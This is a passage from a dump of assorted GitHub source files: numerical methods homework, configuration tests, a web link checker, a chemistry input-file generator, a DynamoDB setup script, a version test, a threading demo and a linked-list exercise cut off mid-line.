Bad starting point.')\n return False\n \n i = 0\n while results['abs_error'][-1] > tol:\n x = newton_iterate(results['x'][-1], f, dx)\n fx = f(x)\n results['x'].append(x)\n results['fx'].append(fx)\n results['abs_error'].append(np.abs(fx))\n if i > 100000:\n print('running away!')\n return False\n i+=1\n return results\n\nx0 = 0.1\ntol = 1e-10\nnewton_results = Newtons_Method(f, dx, x0, tol)\nprint('Result x:', newton_results['x'][-1])\nprint('Iterates:', len(newton_results['x']))\n\n\n# #### b)\n\n# In[52]:\n\n\nplt.plot(list(range(len(newton_results['x']))), newton_results['abs_error'])\nplt.title('Error of Newton\\'s Method')\nplt.xlabel('Iteration')\nplt.ylabel('Error')\nplt.show()\n\n\n# #### c)\n\n# In[66]:\n\n\nrange_of_x0_converage = []\nfailed = []\nfor x0 in x:\n r = Newtons_Method(f, dx, x0, tol)\n if r is False:\n failed.append(x0)\n continue\n if np.abs(r['x'][-1] - newton_results['x'][-1]) < tol:\n range_of_x0_converage.append(x0)\n else:\n failed.append(x0)\nprint(min(range_of_x0_converage), max(range_of_x0_converage))\n\n\n# In[75]:\n\n\nplt.plot(x,f(x))\ngood = np.array(range_of_x0_converage)\nbad = np.array(failed)\nplt.plot(good, f(good), 'r.')\nplt.plot(bad, f(bad), 'b.')\nplt.legend(['good soln', 'wrong soln'])\nplt.title('x0 good vs. wrong convergence')\nplt.xlabel('x0')\nplt.ylabel('f(x0)')\nplt.show()\n\n\n# In[73]:\n\n\nrange_of_convergence = max(list(zip(bad[:-1], bad[1:])), key=lambda d: d[1]-d[0])\nprint('range of convergence (x0): ', range_of_convergence)\n\n\n# ## Problem 2\n# \n# This was strictly for fun!\n\n# In[150]:\n\n\ndef phi_1(x):\n return x**2-2\n\ndef f1(x):\n return x**2-x-2\n\ndef fixed_point_conv(p, f, x0):\n results = {'x' : [x0], 'f' : [f(x0)]}\n for i in range(2):\n x = p(results['x'][-1])\n results['x'].append(x)\n results['f'].append(f(x))\n return results\n\n\n# In[151]:\n\n\nx0 = 0/20\nr = fixed_point_conv(phi_1, f1, x0)\n\n\n# In[152]:\n\n\nr['x'][-1], r['f'][-1]\n\n\n# In[153]:\n\n\nx = np.linspace(-2,3, 100)\n\nplt.plot(x, f1(x))\nplt.plot(x, phi_1(x))\nplt.plot(x, 0*x)\nplt.plot(r['x'], f1(np.array(r['x'])), '.')\nplt.show()\n\n\n# ## Problem 5\n# \n# #### a)\n\n# In[182]:\n\n\ndef get_spetral_radius(A):\n eigs = []\n for lam in np.linalg.eigvals(A):\n try:\n l = (lam.real**2 + lam.imag**2)**(1/2)\n except:\n l = lam\n eigs.append(l)\n \n return np.max(np.abs(eigs))\n\nJ = np.matrix([[0, 2/27, 1/3],\n [1/3, 0, 0],\n [0, 1/3, 0]])\nget_spetral_radius(J)\n\n\n# #### b)\n\n# In[171]:\n\n\ndef phi(x):\n return [\n -1/81*np.cos(x[0])+x[1]**2/9+np.sin(x[2])/3,\n 1/3*np.sin(x[0])+np.cos(x[2])/3,\n -1/9*np.cos(x[0])+x[1]/3+np.sin(x[2])/6\n ]\n\ndef fixed_point_conv(p, x0, tol=1e-8):\n results = {'x' : [x0, p(x0)], 'iterates':2}\n while np.mean(np.abs(np.array(results['x'][-1])-np.array(results['x'][-2]))) > tol:\n x = p(results['x'][-1])\n results['x'].append(x)\n results['iterates'] += 1\n return results\n\n\n# In[172]:\n\n\nx0 = [0,0,0]\nr = fixed_point_conv(phi, x0)\n\n\n# In[178]:\n\n\nprint('Fixed Point Convergence of Equation 3:', r['x'][-1])\n\n\n# #### c)\n\n# In[176]:\n\n\nplt.plot(list(range(r['iterates'])), r['x'])\nplt.title('Fixed Point Convergence of Equation 3')\nplt.xlabel('Iterations')\nplt.ylabel('x')\nplt.legend(['x1', 'x2', 'x3'])\nplt.show()\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"Terry071896/numerical_analysis_1","sub_path":"hw3/hw3.py","file_name":"hw3.py","file_ext":"py","file_size_in_byte":4132,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} 
+{"seq_id":"26193868964","text":"\"\"\"Configuration(json_files=[...]) tests.\"\"\"\n\nimport json\n\nfrom dependency_injector import providers\nfrom pytest import fixture, mark, raises\n\n\n@fixture\ndef config(config_type, json_config_file_1, json_config_file_2):\n if config_type == \"strict\":\n return providers.Configuration(strict=True)\n elif config_type == \"default\":\n return providers.Configuration(json_files=[json_config_file_1, json_config_file_2])\n else:\n raise ValueError(\"Undefined config type \\\"{0}\\\"\".format(config_type))\n\n\ndef test_load(config):\n config.load()\n\n assert config() == {\n \"section1\": {\n \"value1\": 11,\n \"value11\": 11,\n },\n \"section2\": {\n \"value2\": 2,\n },\n \"section3\": {\n \"value3\": 3,\n },\n }\n assert config.section1() == {\"value1\": 11, \"value11\": 11}\n assert config.section1.value1() == 11\n assert config.section1.value11() == 11\n assert config.section2() == {\"value2\": 2}\n assert config.section2.value2() == 2\n assert config.section3() == {\"value3\": 3}\n assert config.section3.value3() == 3\n\n\ndef test_get_files(config, json_config_file_1, json_config_file_2):\n assert config.get_json_files() == [json_config_file_1, json_config_file_2]\n\n\ndef test_set_files(config):\n config.set_json_files([\"file1.json\", \"file2.json\"])\n assert config.get_json_files() == [\"file1.json\", \"file2.json\"]\n\n\ndef test_copy(config, json_config_file_1, json_config_file_2):\n config_copy = providers.deepcopy(config)\n assert config_copy.get_json_files() == [json_config_file_1, json_config_file_2]\n\n\ndef test_file_does_not_exist(config):\n config.set_json_files([\"./does_not_exist.json\"])\n config.load()\n assert config() == {}\n\n\n@mark.parametrize(\"config_type\", [\"strict\"])\ndef test_file_does_not_exist_strict_mode(config):\n config.set_json_files([\"./does_not_exist.json\"])\n with raises(IOError):\n config.load()\n assert config() == {}\n\n\ndef test_required_file_does_not_exist(config):\n config.set_json_files([\"./does_not_exist.json\"])\n with raises(IOError):\n config.load(required=True)\n\n\n@mark.parametrize(\"config_type\", [\"strict\"])\ndef test_not_required_file_does_not_exist_strict_mode(config):\n config.set_json_files([\"./does_not_exist.json\"])\n config.load(required=False)\n assert config() == {}\n\n\ndef test_missing_envs_required(config, json_config_file_3):\n with open(json_config_file_3, \"w\") as file:\n file.write(\n json.dumps(\n {\n \"section\": {\n \"undefined\": \"${UNDEFINED}\",\n },\n },\n ),\n )\n config.set_json_files([json_config_file_3])\n with raises(ValueError, match=\"Missing required environment variable \\\"UNDEFINED\\\"\"):\n config.load(envs_required=True)\n\n\n@mark.parametrize(\"config_type\", [\"strict\"])\ndef test_missing_envs_not_required_in_strict_mode(config, json_config_file_3):\n with open(json_config_file_3, \"w\") as file:\n file.write(\n json.dumps(\n {\n \"section\": {\n \"undefined\": \"${UNDEFINED}\",\n },\n },\n ),\n )\n config.set_json_files([json_config_file_3])\n config.load(envs_required=False)\n assert config.section.undefined() == \"\"\n","repo_name":"ets-labs/python-dependency-injector","sub_path":"tests/unit/providers/configuration/test_json_files_in_init_py2_py3.py","file_name":"test_json_files_in_init_py2_py3.py","file_ext":"py","file_size_in_byte":3377,"program_lang":"python","lang":"en","doc_type":"code","stars":3320,"dataset":"github-code","pt":"77"} +{"seq_id":"21298222296","text":"import re\nimport requests \nfrom bs4 import BeautifulSoup \nimport 
constant\n\nlinks=constant.wa_links\ntitles=[]\nfor i in links:\n reqs = requests.get(i)\n soup = BeautifulSoup(reqs.text, 'html.parser')\n title=(str(soup.title.text).split(\" WHATSAPP\")[0]).replace(\"\\n\",\"\")\n titles.append(title)\n\nprint(titles)\n\nfor i in links:\n reqs = requests.get(i)\n soup = BeautifulSoup(reqs.text, 'html.parser')\n \n tag=soup.find(\"article\")\n para=tag.text.upper()\n for k in titles:\n title1=(str(soup.title.text).split(\" WHATSAPP\")[0]).replace(\"\\n\",\"\")\n count=0\n if(k==title1):\n continue\n if(para.find(k)!=-1):\n for l in tag.find_all('a'):\n if(l.text.upper()==k):\n count=1\n break\n if(count==0):\n print(\"==============\"+soup.title.text)\n print(\"IN :\"+i)\n print(\"SET:\"+k)\n \n \ninput()\n \n\n","repo_name":"piriyaraj/Html","sub_path":"Tech Farm/whatsapp group link/tools/test/post actor hyperlink checker.py","file_name":"post actor hyperlink checker.py","file_ext":"py","file_size_in_byte":973,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"5414159662","text":"#Makes a molecule sandwiched between two hemispheres\n#Then makes Gaussian16 input files for both\n\nimport numpy as np\nimport argparse\nimport KurtGroup.Kurt.structures as struct\nimport KurtGroup.Kurt.chemical_information as ci\nimport KurtGroup.Kurt.xyz as xyz\n\n#INPUTS HERE\n#------------------------------\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(formatter_class=argparse.RawDescriptionHelpFormatter, description='''A script to make junction consisting of a molecule and nanoparticles\n\n To use the following must be given:\n xyz-file atom atom diameter''', epilog='''For help contact\n Theo Juncker von Buchwald\n fnc970@alumni.ku.dk''')\n\n parser.add_argument('infile', type=str, nargs='+', help='The file(s) to extract data from', metavar='.xyz file')\n parser.add_argument('atom1', type=int, nargs=1, help='Atom 1 that should be aligned between the nanoparticles')\n parser.add_argument('atom2', type=int, nargs=1, help='Atom 2 that should be aligned between the nanoparticles')\n parser.add_argument('diameter', type=float, nargs=1, help='Diameter of the nanoparticle')\n\n CrystalGroup = parser.add_argument_group('Nanoparticles')\n CrystalGroup.add_argument('-au', action='store_true', help='Include to make gold nanoparticles')\n CrystalGroup.add_argument('-ag', action='store_true', help='Include to make silver nanoparticles')\n CrystalGroup.add_argument('-cu', action='store_true', help='Include to make copper nanoparticles')\n CrystalGroup.add_argument('-tio2', action='store_true', help='Include to make titanium dioxide nanoparticles')\n CrystalGroup.add_argument('-nacl', action='store_true', help='Include to make salt nanoparticles')\n CrystalGroup.add_argument('-pd', action='store_true', help='Include to make palladium nanoparticles')\n CrystalGroup.add_argument('-pt', action='store_true', help='Include to make platinum nanoparticles')\n CrystalGroup.add_argument('-cosb3', action='store_true', help='Include to make CoSb3 nanoparticles')\n CrystalGroup.add_argument('--dist', default=[-100.0], nargs=1, type=float, help='Include to change distance between molecule and nanoparticle (By default van der Waal radii are used)')\n\n CalculationGroup = parser.add_argument_group('Calculation options')\n CalculationGroup.add_argument('--charge', default=[0], nargs=1, type=int, help='Include to specify charge - 0 if not included')\n CalculationGroup.add_argument('--basis', default=['pc-1'], nargs=1, 
type=str, help='Include to specify basis set of the molecular atoms - pc-1 if not included')\n CalculationGroup.add_argument('--NPbasis', default=['LANL2DZ'], nargs=1, type=str, help='Include to specify basis set of the nanoparticle atoms - LANL2DZ if not included')\n CalculationGroup.add_argument('--ECPbasis', default=['LANL2'], nargs=1, type=str, help='Include to specify electronic core potential basis set for nanoparticle atoms - LANL2 if not included')\n CalculationGroup.add_argument('--method', default=['cam-b3lyp'], nargs=1, type=str, help='Include to specify method for calculation - CAM-B3LYP if not included')\n CalculationGroup.add_argument('--cpu', default=[16], nargs=1, type=int, help='Include to specify the amount of cpu cores - 16 if not included')\n CalculationGroup.add_argument('--mem', default=[16], nargs=1, type=int, help='Include to specify the amount of memory in GB - 16 if not included')\n\n AdditionalCommandsGroup = parser.add_argument_group('Additional commands')\n AdditionalCommandsGroup.add_argument('--outwards', action='store_false', help='Include to turn the nanoparticles outwards')\n AdditionalCommandsGroup.add_argument('--noxyz', action='store_false', help='Include to TURN OFF creation of .xyz files of the nanoparticle system')\n AdditionalCommandsGroup.add_argument('-l', '--linenumber', action='store_true', help='Include to use the linenumber of the atoms in the xyz file instead')\n\n args = parser.parse_args()\n\n Arguments = { #Only crystal structures\n 'Au' : args.au,\n 'Ag' : args.ag,\n 'Cu' : args.cu,\n 'Pt' : args.pt,\n 'Pd' : args.pd,\n 'TiO2' : args.tio2,\n 'NaCl' : args.nacl,\n 'CoSb3' : args.cosb3\n }\n\n if all(value == False for value in Arguments.values()):\n Arguments['Au'] = True\n\n input_files = args.infile\n atom1 = args.atom1[0]\n atom2 = args.atom2[0]\n diameter = args.diameter[0]\n\n charge = args.charge[0]\n basis_mol = args.basis[0]\n basis_NP = args.NPbasis[0]\n basis_ECP = args.ECPbasis[0]\n method = args.method[0]\n ncpus=args.cpu[0]\n mem=args.mem[0]\n\n inwards = args.outwards\n returnxyz = args.noxyz\n linenumber = args.linenumber\n\n user_dist = False\n\n if args.dist[0] >= 0:\n user_dist = True\n dist_mol_nano = args.dist[0]\n print(f\"The distance between molecule and nanoparticle has been set to {dist_mol_nano} Å\")\n elif args.dist[0] != -100:\n print(\"A negative distance between molecule and nanoparticle does not make sense! 
Defaulting to van der Waal radii.\")\n\n\n\n if linenumber:\n atom1 -=3\n atom2 -=3\n else:\n atom1 -=1\n atom2 -=1\n\n #Check if basis set is in Gaussian already\n BSE_mol = True\n BSE_NP = True\n BSE_ECP = True\n\n BSE_mol = ci.BasisSet.CheckBasisSet('Gaussian94', basis_mol)\n BSE_NP = ci.BasisSet.CheckBasisSet('Gaussian94', basis_NP)\n BSE_ECP = ci.BasisSet.CheckBasisSet('Gaussian94', basis_ECP)\n\n basis_mol_exists = xyz.checkBasis('Gaussian94', basis_mol)\n basis_NP_exists = xyz.checkBasis('Gaussian94', basis_NP)\n basis_ECP_exists = xyz.checkBasis('Gaussian94', basis_ECP)\n\n # Getting basis set from Basis set exchange\n BasisSet = ci.BasisSet()\n\n for molfile in input_files:\n namesmol = np.array([])\n molxyz = struct.Molecule(np.empty((0, 3)))\n with open(molfile, 'r') as f:\n lines = f.readlines()\n for i in range(2, len(lines)):\n x = lines[i].split()\n namesmol = np.append(namesmol, x[0])\n molxyz.molecule = np.vstack([molxyz.molecule, np.array([float(x[1]), float(x[2]), float(x[3])])])\n\n if BSE_mol and not basis_mol_exists:\n basis_mol = BasisSet.GenerateBasisSet('gaussian94', basis_mol, namesmol)\n\n\n #We get the axis between the two points to be parallel to the x-axis and then translate it such that it lies in the x-axis\n #Get normalized vector defining the axis\n v1 = molxyz.molecule[atom1, :] - molxyz.molecule[atom2, :]\n v1 *= 1 / np.sqrt(np.dot(v1, v1))\n\n #Calculate angle in order to be parallel to the x-axis\n theta = np.arccos(np.dot(v1, np.array([1, 0, 0])))\n\n #The direction vector for the rotation in orthogonal to both v1 and the x-axis. Note that the normalization is crucial.\n dir_vec = np.cross(v1, np.array([1, 0, 0]))\n dir_vec *= 1/np.sqrt(np.dot(dir_vec, dir_vec))\n\n molxyz.get_rotation_matrix(molxyz.molecule[atom1], dir_vec, theta)\n molxyz.rotateMolecule(atom1)\n\n molxyz.__xlen__()\n\n mol_min = molxyz.min()\n mol_max = molxyz.max()\n\n index_min = molxyz.index_min()\n index_max = molxyz.index_max()\n\n #Rescaling to get index in array\n\n #Crystal Structure (Au, Ag, Cu, TiO2, NaCl, CoSb3, Pt, Pd)\n crystal_structures = [item[0] for item in Arguments.items() if item[1] == True]\n for crystal_structure in crystal_structures:\n NP = struct.NanoParticle(crystal_structure)\n\n NP.setInwards(inwards)\n NP.setDiameter(diameter)\n\n atoms_symbol, atoms_pos = NP.makeNanoparticle(diameter)\n\n if user_dist:\n left, right, left_symbols, right_symbols = NP.makeSandwich(molxyz, namesmol,input_dist=dist_mol_nano)\n else:\n left, right, left_symbols, right_symbols = NP.makeSandwich(molxyz, namesmol)\n\n atmtype = NP.atomtypes\n\n if BSE_NP and not basis_NP_exists:\n basis_NP = BasisSet.GenerateBasisSet('gaussian94', basis_NP, atmtype)\n if BSE_ECP and not basis_ECP_exists:\n basis_ECP = BasisSet.GenerateBasisSet('gaussian94', basis_ECP, atmtype)\n\n if returnxyz:\n #Build .xyz files\n for j in ['left','right']:\n lines_to_add = []\n lines_to_add.append(str(left[:,0].size+molxyz.molecule[:,0].size)+'\\n')\n lines_to_add.append('\\n')\n\n for i in range(len(left[:,0])):\n if j == 'left':\n lines_to_add.append(''.join([atoms_symbol[i],' ',f\"{left[i,0]:.6f}\",' ', f\"{left[i,1]:.6f}\", ' ',f\"{left[i,2]:.6f}\" ,'\\n']))\n else:\n lines_to_add.append(''.join([atoms_symbol[i],' ',f\"{right[i,0]:.6f}\",' ', f\"{right[i,1]:.6f}\", ' ',f\"{right[i,2]:.6f}\" ,'\\n']))\n\n for i in range(len(molxyz.molecule[:,0])):\n lines_to_add.append(''.join([namesmol[i],' ',f\"{molxyz.molecule[i,0]:.6f}\",' ', f\"{molxyz.molecule[i,1]:.6f}\", ' ',f\"{molxyz.molecule[i,2]:.6f}\" 
,'\\n']))\n\n with open(molfile[:-4] + f'_charge_{charge}_{crystal_structure}_'+j+'.xyz','w') as f:\n f.writelines(lines_to_add)\n\n\n for j in ['left','right']:\n filename = molfile[:-4] + f'_charge_{charge}_{crystal_structure}_'+j\n lines_com = []\n lines_com.append(f\"%mem={mem}GB\\n\")\n lines_com.append(f\"%nprocshared={ncpus}\\n\")\n lines_com.append(f\"%chk={filename}.chk\\n\")\n lines_com.append(f\"# {method}/GEN PSEUDO=READ scf=qc pop=full iop(3/33=1)\\n\")\n lines_com.append('\\n')\n if user_dist:\n lines_com.append(f\"Hej Magnus - {molfile}-{j} - Distance has been set as {dist_mol_nano} Å by the user\\n\")\n else:\n lines_com.append(f\"Hej Theo - {molfile}-{j}\\n\")\n lines_com.append('\\n')\n\n nr_of_electrons = 0\n if j == 'left':\n for i in range(len(left[:,0])):\n nr_of_electrons += ci.getAtomnr(atoms_symbol[i])\n else:\n for i in range(len(right[:,0])):\n nr_of_electrons += ci.getAtomnr(atoms_symbol[i])\n if nr_of_electrons % 2:\n multiplicity = 2\n else:\n multiplicity = 1\n\n if charge == 0 or abs(charge) == 2:\n lines_com.append(f\"{charge} {multiplicity} {charge} 1 0 1\\n\")\n else:\n lines_com.append(f\"{charge} {multiplicity} {charge} 2 0 1\\n\")\n for i in range(len(namesmol)):\n lines_com.append(''.join([namesmol[i],'(Fragment=1)',' ',f\"{molxyz.molecule[i,0]:.9f}\",' ', f\"{molxyz.molecule[i,1]:.9f}\", ' ',f\"{molxyz.molecule[i,2]:.9f}\" ,'\\n']))\n if j == 'left':\n for i in range(len(left[:,0])):\n lines_com.append(''.join([atoms_symbol[i],'(Fragment=2)',' ',f\"{left[i,0]:.9f}\",' ', f\"{left[i,1]:.9f}\", ' ',f\"{left[i,2]:.9f}\" ,'\\n']))\n else:\n for i in range(len(right[:,0])):\n lines_com.append(''.join([atoms_symbol[i],'(Fragment=2)',' ',f\"{right[i,0]:.9f}\",' ', f\"{right[i,1]:.9f}\", ' ',f\"{right[i,2]:.9f}\" ,'\\n']))\n lines_com.append('\\n')\n for i in atmtype:\n if i not in set(namesmol):\n if basis_NP_exists:\n lines_com.append(i+'\\n')\n lines_com.append(basis_NP+'\\n')\n lines_com.append('****'+'\\n')\n else:\n lines_com.append(basis_NP+'\\n')\n break\n for i in set(namesmol):\n if i not in atmtype:\n if basis_mol_exists:\n lines_com.append(i+'\\n')\n lines_com.append(basis_mol+'\\n')\n lines_com.append('****'+'\\n')\n else:\n lines_com.append(basis_mol)\n break\n for i in atmtype:\n if basis_ECP_exists:\n lines_com.append(i+' 0\\n')\n lines_com.append(basis_ECP+'\\n')\n lines_com.append('\\n')\n else:\n lines_com.append(basis_ECP+'\\n')\n lines_com.append('\\n')\n with open(filename+'.com','w') as f:\n f.writelines(lines_com)\n\n if returnxyz:\n print(molfile[:-4]+f'_charge_{charge}_{crystal_structure}_left.xyz')\n print(molfile[:-4]+f'_charge_{charge}_{crystal_structure}_right.xyz')\n print(molfile[:-4]+f'_charge_{charge}_{crystal_structure}_left.com')\n print(molfile[:-4]+f'_charge_{charge}_{crystal_structure}_right.com')\n","repo_name":"TheoBuchwald/UCPH-KVM","sub_path":"leftright.py","file_name":"leftright.py","file_ext":"py","file_size_in_byte":13248,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"77"} +{"seq_id":"20315689043","text":"import tkinter as tk\nfrom math import sqrt\nfrom copy import deepcopy\n\n\nclass Matrix:\n def __init__(self, matrix: list) -> None:\n if not len(matrix):\n raise ValueError(\"Can't make matrix from empty array.\")\n\n self.matrix = matrix\n self.x_size = len(matrix[0])\n self.y_size = len(matrix)\n\n def vector_length(self):\n if any([len(x) > 1 for x in self.matrix]):\n raise ValueError(\"This is not a vector.\")\n\n return sqrt(sum([sum(x) ** 2 for x in 
self.matrix[:-1]]))\n\n    def normalize(self):\n        matrix = deepcopy(self.matrix)\n        length = self.vector_length()\n\n        return Matrix([list(map(lambda y: y / length, x)) for x in matrix])\n\n    def shape(self):\n        return (self.x_size, self.y_size)\n\n    def __str__(self) -> str:\n        return self.matrix.__str__()\n\n    def __repr__(self) -> str:\n        return self.matrix.__str__()\n\n    def __add__(self, other):\n        if self.shape() != other.shape():\n            raise ValueError(\"Matrices do not share the same shape.\")\n\n        matrix = []\n        for row in range(self.y_size):\n            matrix.append([])\n            for col in range(self.x_size):\n                matrix[-1].append(self.matrix[row][col] + other[row][col])\n\n        return Matrix(matrix)\n\n    def __sub__(self, other):\n        if self.shape() != other.shape():\n            raise ValueError(\"Matrices do not share the same shape.\")\n\n        matrix = []\n        for row in range(self.y_size):\n            matrix.append([])\n            for col in range(self.x_size):\n                matrix[-1].append(self.matrix[row][col] - other[row][col])\n\n        return Matrix(matrix)\n\n    def __truediv__(self, other):\n        if type(other) == Matrix:\n            raise ValueError(\"Cannot divide matrices.\")\n\n        matrix = []\n        for row in range(self.y_size):\n            matrix.append([])\n            for col in range(self.x_size):\n                matrix[-1].append(self.matrix[row][col] / other)\n\n        return Matrix(matrix)\n\n    def __mul__(self, other):\n        if type(other) == Matrix:\n            if self.x_size != other.y_size and self.x_size != 1 and other.x_size != 1:\n                raise ValueError(\"Cannot multiply matrices with mismatched dimensions.\")\n\n            matrix = []\n\n            if self.x_size == 1 and other.x_size == 1:\n                tmp = 0\n\n                for x in range(3):\n                    tmp += self.matrix[x][0] * other.matrix[x][0]\n\n                return tmp\n\n            for row in range(self.y_size):\n                matrix.append([])\n                for col in range(other.x_size):\n                    matrix[-1].append(0)\n\n            for row in range(self.y_size):\n                for col in range(other.x_size):\n                    for i in range(other.y_size):\n                        matrix[row][col] += self.matrix[row][i] * other.matrix[i][col]\n\n            return Matrix(matrix)\n\n        elif type(other) in (int, float):\n            matrix = Matrix(list(self.matrix))\n\n            for row in range(self.y_size):\n                for col in range(self.x_size):\n                    matrix.matrix[row][col] *= other\n\n            return matrix\n\n        raise NotImplementedError()\n\n    def __getitem__(self, key):\n        return self.matrix[key]\n\n\nclass IndexedFace:\n    verteces = None\n    indeces = None\n\n    def __init__(self, verteces: list, indeces: list) -> None:\n        self.verteces = verteces\n        self.original_verteces = deepcopy(verteces)\n        self.indeces = indeces\n\n    def __str__(self) -> str:\n        return f\"IndexedFace - {self.verteces}\"\n\n    def __repr__(self) -> str:\n        return f\"IndexedFace - {self.verteces}\"\n\n    def set_color(self, color):\n        self.color = color\n\n    def set_transformation_matrix(self, transformation_matrix):\n        self.transform = transformation_matrix\n\n        for i in range(len(self.verteces)):\n            self.verteces[i] = self.transform * self.verteces[i]\n\n    def reset(self):\n        self.verteces = deepcopy(self.original_verteces)\n\n    def display(self, canvas: tk.Canvas, transform: Matrix, luminosity: float):\n        points = []\n\n        for vertex in self.verteces:\n            points.append(vertex[0][0])\n            points.append(vertex[1][0])\n\n        color = (int(x * luminosity) for x in self.color)\n        hexcode = \"#\"\n\n        for value in color:\n            hexvalue = hex(value)\n\n            if hexvalue[0] == \"-\":\n                hexvalue = hexvalue[3:]\n            else:\n                hexvalue = hexvalue[2:]\n\n            if len(hexvalue) == 1:\n                hexvalue = \"0\" + hexvalue\n\n            hexcode += hexvalue\n\n        canvas.create_polygon(points, fill=hexcode)\n\n    def center_of_gravity(self):\n        matrix = []\n\n        for row in range(4):\n 
matrix.append([sum([x[row][0] for x in self.verteces]) / 3])\n\n return Matrix(matrix)\n\n def get_normal(self):\n v1 = self.verteces[1] - self.verteces[0]\n v2 = self.verteces[2] - self.verteces[0]\n\n Cx = v1[1][0] * v2[2][0] - v1[2][0] * v2[1][0]\n Cy = v1[2][0] * v2[0][0] - v1[0][0] * v2[2][0]\n Cz = v1[0][0] * v2[1][0] - v1[1][0] * v2[0][0]\n\n return Matrix([[Cx], [Cy], [Cz]])\n\n\nif __name__ == \"__main__\":\n # m = Matrix([[1, 0], [0, 1]])\n\n # print(m * 5)\n\n # m2 = Matrix([[0, 0],\n # [0, 0]])\n\n # print(m * m2)\n\n # m3 = Matrix([[2, 7], [9, 14]])\n\n # print(m * m3)\n\n v1 = Matrix([[1], [2], [3]])\n v2 = Matrix([[2], [3], [4]])\n\n print(v1 * v2)\n","repo_name":"ipinfil/zpgso-project","sub_path":"geometry.py","file_name":"geometry.py","file_ext":"py","file_size_in_byte":5544,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"37225704273","text":"#!/usr/local/bin/python\nimport boto3\nfrom botocore.exceptions import ClientError, EndpointConnectionError\n\ndynamo_client = boto3.client(\n 'dynamodb',\n endpoint_url='http://localhost:4566'\n)\n\ndef create_text_table():\n global dynamo_client\n dynamo_client.create_table(\n TableName='texts',\n BillingMode='PAY_PER_REQUEST',\n AttributeDefinitions=[\n {\n 'AttributeName': 'id',\n 'AttributeType': 'S'\n }\n ],\n KeySchema=[\n {\n 'AttributeName': 'id',\n 'KeyType': 'HASH'\n }\n ]\n )\n\nis_to_keep_trying_to_create_database = True\nwhile is_to_keep_trying_to_create_database:\n try:\n create_text_table()\n is_to_keep_trying_to_create_database = False\n except ClientError as e:\n error = e.response.get('Error').get('Code')\n if error == 'ResourceInUseException':\n is_to_keep_trying_to_create_database = False\n else:\n raise e\n except EndpointConnectionError:\n continue","repo_name":"PeterCcT/presentation-kubernetes-basics","sub_path":"database/create_database.py","file_name":"create_database.py","file_ext":"py","file_size_in_byte":1077,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"37569273762","text":"#!/usr/bin/env python3\n\nimport subprocess\nimport re\n\nclass TestServerVersion(object):\n\n def test_version(self, hge_ctx):\n resp = hge_ctx.http.get(\n hge_ctx.hge_url + '/v1/version'\n )\n assert resp.status_code == 200, resp\n version_json = resp.json()\n assert isinstance(version_json, dict), version_json\n\n server_version = version_json['version']\n\n # The magic number here means we're compiling for local development and\n # this test can be ignored:\n if server_version == '12345':\n return\n\n # Grab the Git details so that we know why things changed.\n def error_message():\n git_status = subprocess.run(['git', 'status', '--porcelain'], stdout=subprocess.PIPE, stderr=subprocess.STDOUT, encoding='utf8').stdout\n git_diff = subprocess.run(['git', 'diff-index', '-p', 'HEAD', '--'], stdout=subprocess.PIPE, stderr=subprocess.STDOUT, encoding='utf8').stdout\n return f'Version JSON:\\n{version_json}\\n\\nGit status:\\n{git_status}\\n\\nGit diff:{git_diff}\\n'\n\n # The tree may be dirty because we're developing tests locally while\n # graphql-engine was built previously when tree was clean. 
If we're\n # modifying graphql-engine too then both of these will be tagged dirty,\n # since a rebuild would necessarily be forced:\n assert server_version in (hge_ctx.version, re.sub('-dirty$', '', hge_ctx.version)), error_message()\n","repo_name":"hasura/graphql-engine","sub_path":"server/tests-py/test_version.py","file_name":"test_version.py","file_ext":"py","file_size_in_byte":1478,"program_lang":"python","lang":"en","doc_type":"code","stars":30481,"dataset":"github-code","pt":"77"} +{"seq_id":"8878338967","text":"import threading\nfrom multiprocessing import Queue\nimport queue\n\nitems = ['car', 'two-wheeler', 'plane']\n\ndef execute():\n if q.not_empty:\n print('In execute method')\n item = q.get()\n val = item * 2\n print(val)\n q.task_done()\n #print(q.get())\n\nq = queue.Queue()\ntlist = []\nfor i in range(4):\n t = threading.Thread(target=execute)\n tlist.append(t)\n t.start()\n\nfor item in items:\n q.put(item) # put the items in queue\n\n#for i in tlist:\n# i.join()\n\nq.join()\n\nprint('done')\nprint('exit')\n#q.join()\n#print(q.unfinished_tasks)","repo_name":"sivaprasadkonduru/Python-Programs","sub_path":"Dreamwin4/thread_communicate.py","file_name":"thread_communicate.py","file_ext":"py","file_size_in_byte":580,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"77"} +{"seq_id":"32415809309","text":"import time\nfrom typing import Optional\n\nclass ListNode:\n def __init__(self, val=0, next=None):\n self.val = val\n self.next = next\n\nclass Solution:\n def addTwoNumbers(self, l1: Optional[ListNode], l2: Optional[ListNode]) -> Optional[ListNode]:\n carry = 0\n last = ListNode(-1)\n node = last\n \n while l1 and l2:\n # We calculate the sum \n sum = l1.val + l2.val + carry\n \n # We create the new node, append it and update last to point to it\n last.next = ListNode(sum % 10, None)\n last = last.next \n \n # We update the carry\n carry = int(sum/10)\n \n # We update l1 and l2\n l1 = l1.next\n l2 = l2.next\n \n # If there are still nodes in l1\n while l1:\n # We calculate the sum \n sum = l1.val + carry\n \n # We create the new node, append it and update last to point to it\n last.next = ListNode(sum % 10, None)\n last = last.next\n \n # We update the carry\n carry = int(sum/10)\n \n # We update l1\n l1 = l1.next\n \n # If there are still nodes in l2\n while l2:\n # We calculate the sum \n sum = l2.val + carry\n \n # We create the new node, append it and update last to point to it\n last.next = ListNode(sum % 10, None)\n last = last.next\n \n # We update the carry\n carry = int(sum/10)\n \n # We update l2\n l2 = l2.next\n \n # If there's remaining carry we update it\n while carry > 0:\n # We calculate the sum \n sum = carry\n \n # We create the new node, append it and update last to point to it\n last.next = ListNode(sum % 10, None)\n last = last.next\n \n # We update the carry\n carry = int(sum/10)\n \n return node\n \n# Program\nl1 = ListNode(2, ListNode(4, ListNode(3, None)))\nl2 = ListNode(5, ListNode(6, ListNode(4, None)))\n\nr1 = ListNode(9, ListNode(9, ListNode(9, ListNode(9, ListNode(9, 